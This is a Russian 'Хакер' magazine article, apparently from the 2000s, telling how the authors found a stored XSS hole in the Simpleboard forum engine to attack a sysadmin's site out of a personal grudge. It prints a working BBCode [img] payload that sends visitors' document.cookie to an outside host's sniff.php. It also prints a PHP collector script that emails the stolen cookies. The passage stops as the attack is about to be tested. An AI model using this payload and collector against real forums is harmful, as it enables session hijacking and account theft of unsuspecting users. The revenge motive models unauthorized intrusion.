Жук для опытов

.::Gh0st::. && BlackPrince

Хакер, номер #075, стр. 075-068-1

(icq:7497474) && (BlackPrince@nsd.ru)

Уязвимости форумного движка Simpleboard Forum

Наверное, ты иногда мечтаешь быть богом в Сети, чтобы тебя уважали, считались с твоим мнением, а некоторые и вовсе опасались. Ты читаешь журнал «Хакер» и, надеюсь, способен объективно оценить свои реальные возможности. Что, негусто? :) Хочешь оказаться на новом уровне мастерства, искать новые уязвимости, о которых никто еще не знает? Ты попал по адресу, сегодня мы расскажем реальную историю о том, как просто и интересно находить баги в форумных движках.

Intro

Чтобы ты не путался, мы решили писать статью от одного лица, все события и действующие лица реальны, как наш мир :).

Как-то при встрече одна моя подружка пожаловалась, что ее притесняет на работе системный администратор: урезает трафик, запрещает пользоваться ICQ и вообще, перекрыл девчонке кислород. А сам сидит себе админит какой-то свой сайт, банит юзеров на форуме, пьет пиво и радуется жизни, как бегемот. «Что ж, - подумал я, - сайт - это прекрасно, сейчас посмотрим, как там все работает».

Набрав в браузере нужный адрес, я принялся изучать вражеский сайт и искать там уязвимости. Первым делом я определил, что там стоит форум Simpleboard. Тщательные поиски упоминаний об этой системе в багтрак-лентах поставили меня в тупик: было найдено всего две уязвимости, датированные 2002 годом, и они по понятной причине не работали :(. В ходе изучения этого форума я выяснил, что он поставляется с сайтовым движком Mambo. Уязвимостей у Мамбо было немногим больше, но даже самая свежая дыра была, увы, прошлогодней. Что ж, придется искать баги самостоятельно.

Я принялся тестировать скрипты на sql-injection, попутно рассматривая возможность осуществления CSS-атаки. После непродолжительных поисков я обнаружил, что при добавлении сообщения можно внедрить javascript-код в текст мессаги. Оказалось, что если в качестве картинки вставить скрипт наподобие javascript:alert('hello'), то при просмотре мессаги выскочит сообщение с надписью «hello». Поскольку для продолжения атаки у меня не хватало опыта и я прекрасно понимал, что две головы значительно лучше одной, я обратился за помощью к своему давнему другу Gh0st'у.

Тырим плюшки

Вкратце рассказав о найденной уязвимости, я предложил ему принять участие в исследовании нового бага. После нескольких экспериментов была составлена конструкция вида [img size=150]"style=background:url(javascript:document.images[0].src="http://www.hackersite.ru/sniff.php?"+document.cookie);[/img], которая в предпросмотре отправляла кукисы пользователя специальному скрипту, расположенному по адресу www.hackersite.ru/sniff.php. Этот простейший сценарий просто высылал все получаемые переменные на указанный e-mail:

Пример скрипта для кражи cookies

<?

if(isset($QUERY_STRING))

{

$date= date('d.m.y : H:i:s');

mail("mail1.@mail.ru, mail2@mail.ru", "New Cookie", " Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING");

}

?>

Фильтруй базар

После того как этот скрипт был установлен на одном из серверов, настало время испытать его в действии.